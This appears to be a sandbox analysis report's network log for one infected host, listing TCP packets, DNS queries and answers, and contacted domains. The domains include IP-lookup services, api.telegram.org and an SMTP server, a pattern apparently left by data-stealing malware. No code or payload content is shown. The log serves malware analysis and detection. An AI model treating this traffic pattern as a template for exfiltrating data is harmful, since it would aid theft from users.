Jan 10, 2025 15:03:49.005582094 CET	443	49727	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.160007954 CET	443	49727	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.160094976 CET	443	49727	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.160181046 CET	49727	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:49.160851955 CET	49727	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:49.167737961 CET	49729	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.172555923 CET	80	49729	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:49.172632933 CET	49729	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.172792912 CET	49729	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.177702904 CET	80	49729	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:49.400213957 CET	443	49728	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.402388096 CET	49728	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:49.402405024 CET	443	49728	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.531271935 CET	443	49728	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.531358004 CET	443	49728	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.531436920 CET	49728	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:49.532123089 CET	49728	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:49.537050962 CET	49725	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.538263083 CET	49730	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.542035103 CET	80	49725	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:49.542097092 CET	49725	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.543059111 CET	80	49730	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:49.543121099 CET	49730	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.543309927 CET	49730	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.548079967 CET	80	49730	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.118618965 CET	80	49730	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.139343977 CET	49731	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.139415026 CET	443	49731	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.139535904 CET	49731	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.148948908 CET	49731	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.148969889 CET	443	49731	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.167208910 CET	49730	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.337177038 CET	80	49729	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.339174986 CET	49732	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.339217901 CET	443	49732	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.339286089 CET	49732	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.339530945 CET	49732	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.339543104 CET	443	49732	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.382348061 CET	49729	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.604456902 CET	443	49731	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.606674910 CET	49731	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.606692076 CET	443	49731	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.759306908 CET	443	49731	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.759396076 CET	443	49731	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.759500027 CET	49731	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.760209084 CET	49731	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.763715982 CET	49730	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.764929056 CET	49733	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.768691063 CET	80	49730	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.768743038 CET	49730	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.769727945 CET	80	49733	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.769798994 CET	49733	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.769881010 CET	49733	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.774605989 CET	80	49733	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.792259932 CET	443	49732	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.801211119 CET	49732	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.801244020 CET	443	49732	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.918577909 CET	443	49732	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.918673992 CET	443	49732	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:50.918732882 CET	49732	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.919476032 CET	49732	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:50.923463106 CET	49729	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.924485922 CET	49734	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.928453922 CET	80	49729	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.928535938 CET	49729	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.929264069 CET	80	49734	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:50.929337978 CET	49734	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.929568052 CET	49734	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:50.934314966 CET	80	49734	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:51.882884979 CET	80	49733	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:51.884691954 CET	49735	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:51.884721041 CET	443	49735	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:51.885021925 CET	49735	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:51.885163069 CET	49735	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:51.885178089 CET	443	49735	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:51.929256916 CET	49733	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.007836103 CET	80	49734	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:52.009453058 CET	49736	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.009516954 CET	443	49736	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.009596109 CET	49736	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.009922981 CET	49736	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.009938955 CET	443	49736	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.054987907 CET	49734	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.358062983 CET	443	49735	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.359690905 CET	49735	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.359710932 CET	443	49735	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.471774101 CET	443	49736	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.474281073 CET	49736	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.474318981 CET	443	49736	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.505912066 CET	443	49735	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.505990028 CET	443	49735	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.506139040 CET	49735	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.506814957 CET	49735	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.532915115 CET	49733	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.538244009 CET	80	49733	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:52.538356066 CET	49733	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.541189909 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:52.541239023 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:52.541476965 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:52.542150974 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:52.542161942 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:52.606324911 CET	443	49736	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.606385946 CET	443	49736	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:52.606477976 CET	49736	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.617934942 CET	49736	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:52.799649000 CET	49734	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.800307989 CET	49739	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.804649115 CET	80	49734	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:52.804820061 CET	49734	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.805171967 CET	80	49739	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:52.806417942 CET	49739	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.808335066 CET	49739	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:52.813105106 CET	80	49739	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:53.173958063 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:53.174145937 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:53.197640896 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:53.197674990 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:53.198029995 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:53.199985981 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:53.243340015 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:53.430481911 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:53.430567026 CET	443	49737	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:53.430979013 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:53.438649893 CET	49737	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:53.985341072 CET	80	49739	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:53.987329006 CET	49743	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:53.987384081 CET	443	49743	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:53.987540007 CET	49743	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:53.987807989 CET	49743	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:53.987834930 CET	443	49743	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:54.038598061 CET	49739	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:54.440206051 CET	443	49743	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:54.449702978 CET	49743	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:54.449742079 CET	443	49743	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:54.586122990 CET	443	49743	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:54.586199999 CET	443	49743	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:54.586544991 CET	49743	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:54.587379932 CET	49743	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:54.590523005 CET	49739	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:54.592575073 CET	49745	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:54.595594883 CET	80	49739	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:54.595729113 CET	49739	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:54.597470045 CET	80	49745	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:54.597606897 CET	49745	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:54.597693920 CET	49745	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:54.602514982 CET	80	49745	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:55.182022095 CET	80	49745	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:55.184051037 CET	49747	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:55.184099913 CET	443	49747	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:55.184590101 CET	49747	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:55.184741974 CET	49747	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:55.184762955 CET	443	49747	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:55.228250027 CET	49745	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:55.657740116 CET	443	49747	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:55.665756941 CET	49747	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:55.665781021 CET	443	49747	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:55.788126945 CET	443	49747	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:55.788194895 CET	443	49747	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:55.788256884 CET	49747	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:55.943011045 CET	49747	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:56.269197941 CET	49745	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:56.275079012 CET	80	49745	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:56.275151968 CET	49745	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:56.285895109 CET	49749	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:56.290822029 CET	80	49749	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:56.290896893 CET	49749	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:56.291120052 CET	49749	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:56.295856953 CET	80	49749	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:56.881597996 CET	80	49749	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:56.883250952 CET	49755	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:56.883297920 CET	443	49755	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:56.883379936 CET	49755	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:56.883671999 CET	49755	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:56.883682013 CET	443	49755	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:56.929243088 CET	49749	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:57.333260059 CET	443	49755	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:57.353024960 CET	49755	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:57.353063107 CET	443	49755	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:57.465886116 CET	443	49755	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:57.465948105 CET	443	49755	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:57.466017008 CET	49755	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:57.466442108 CET	49755	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:57.478096962 CET	49749	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:57.478933096 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:57.479017973 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:57.479124069 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:57.479549885 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:57.479585886 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:57.483098030 CET	80	49749	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:57.483242035 CET	49749	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:58.140558958 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:58.140644073 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:58.142247915 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:58.142260075 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:58.142709017 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:58.145148993 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:58.187326908 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:58.402190924 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:58.402338028 CET	443	49756	149.154.167.220	192.168.2.5
Jan 10, 2025 15:03:58.402401924 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:03:58.404524088 CET	49756	443	192.168.2.5	149.154.167.220
Jan 10, 2025 15:04:01.375407934 CET	49714	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:04:01.804512978 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:01.809369087 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:01.809453964 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:02.379635096 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.379834890 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:02.384740114 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.527446985 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.532186031 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:02.537029028 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.682446003 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.682765007 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:02.687618017 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.836429119 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.836674929 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:02.841568947 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.986206055 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:02.986669064 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:02.991432905 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.160634041 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.164448977 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:03.169316053 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.312763929 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.317994118 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:03.318075895 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:03.318128109 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:03.318165064 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:03.322787046 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.322838068 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.323079109 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.323090076 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.323098898 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.665513992 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:03.710486889 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:05.634864092 CET	49726	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:04:05.777013063 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:05.781810999 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:05.781923056 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:06.393167019 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:06.395332098 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:06.400245905 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:06.545522928 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:06.545859098 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:06.550717115 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:06.698613882 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:06.699249983 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:06.704097986 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:06.854763985 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:06.855021954 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:06.859778881 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.020087004 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.063376904 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:07.068205118 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.238522053 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.258816004 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:07.263617039 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.410089016 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.460539103 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:07.496666908 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:07.496666908 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:07.496687889 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:07.496866941 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:04:07.501508951 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.501522064 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.501619101 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.501627922 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.501739979 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:07.977968931 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:04:08.023073912 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:05:41.782824993 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:05:41.787727118 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:05:41.931027889 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:05:41.931169987 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:05:41.931243896 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:05:41.931921959 CET	49787	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:05:41.936682940 CET	587	49787	208.91.199.223	192.168.2.5
Jan 10, 2025 15:05:45.804636002 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:05:45.809420109 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:05:45.956830025 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:05:45.956880093 CET	587	49812	208.91.199.223	192.168.2.5
Jan 10, 2025 15:05:45.956945896 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:05:45.956945896 CET	49812	587	192.168.2.5	208.91.199.223
Jan 10, 2025 15:05:45.961772919 CET	587	49812	208.91.199.223	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:03:39.798917055 CET	52921	53	192.168.2.5	1.1.1.1
Jan 10, 2025 15:03:39.806174040 CET	53	52921	1.1.1.1	192.168.2.5
Jan 10, 2025 15:03:40.674297094 CET	51156	53	192.168.2.5	1.1.1.1
Jan 10, 2025 15:03:40.684137106 CET	53	51156	1.1.1.1	192.168.2.5
Jan 10, 2025 15:03:52.533565044 CET	60322	53	192.168.2.5	1.1.1.1
Jan 10, 2025 15:03:52.540390015 CET	53	60322	1.1.1.1	192.168.2.5
Jan 10, 2025 15:04:01.764302969 CET	65026	53	192.168.2.5	1.1.1.1
Jan 10, 2025 15:04:01.773216009 CET	53	65026	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 15:03:39.798917055 CET	192.168.2.5	1.1.1.1	0xb759	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.674297094 CET	192.168.2.5	1.1.1.1	0xba8b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:52.533565044 CET	192.168.2.5	1.1.1.1	0x8465	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:04:01.764302969 CET	192.168.2.5	1.1.1.1	0xa18	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 15:03:39.806174040 CET	1.1.1.1	192.168.2.5	0xb759	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 15:03:39.806174040 CET	1.1.1.1	192.168.2.5	0xb759	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:39.806174040 CET	1.1.1.1	192.168.2.5	0xb759	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:39.806174040 CET	1.1.1.1	192.168.2.5	0xb759	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:39.806174040 CET	1.1.1.1	192.168.2.5	0xb759	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:39.806174040 CET	1.1.1.1	192.168.2.5	0xb759	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.684137106 CET	1.1.1.1	192.168.2.5	0xba8b	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.684137106 CET	1.1.1.1	192.168.2.5	0xba8b	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.684137106 CET	1.1.1.1	192.168.2.5	0xba8b	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.684137106 CET	1.1.1.1	192.168.2.5	0xba8b	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.684137106 CET	1.1.1.1	192.168.2.5	0xba8b	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.684137106 CET	1.1.1.1	192.168.2.5	0xba8b	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:40.684137106 CET	1.1.1.1	192.168.2.5	0xba8b	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:03:52.540390015 CET	1.1.1.1	192.168.2.5	0x8465	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:04:01.773216009 CET	1.1.1.1	192.168.2.5	0xa18	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:04:01.773216009 CET	1.1.1.1	192.168.2.5	0xa18	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:04:01.773216009 CET	1.1.1.1	192.168.2.5	0xa18	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:04:01.773216009 CET	1.1.1.1	192.168.2.5	0xa18	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

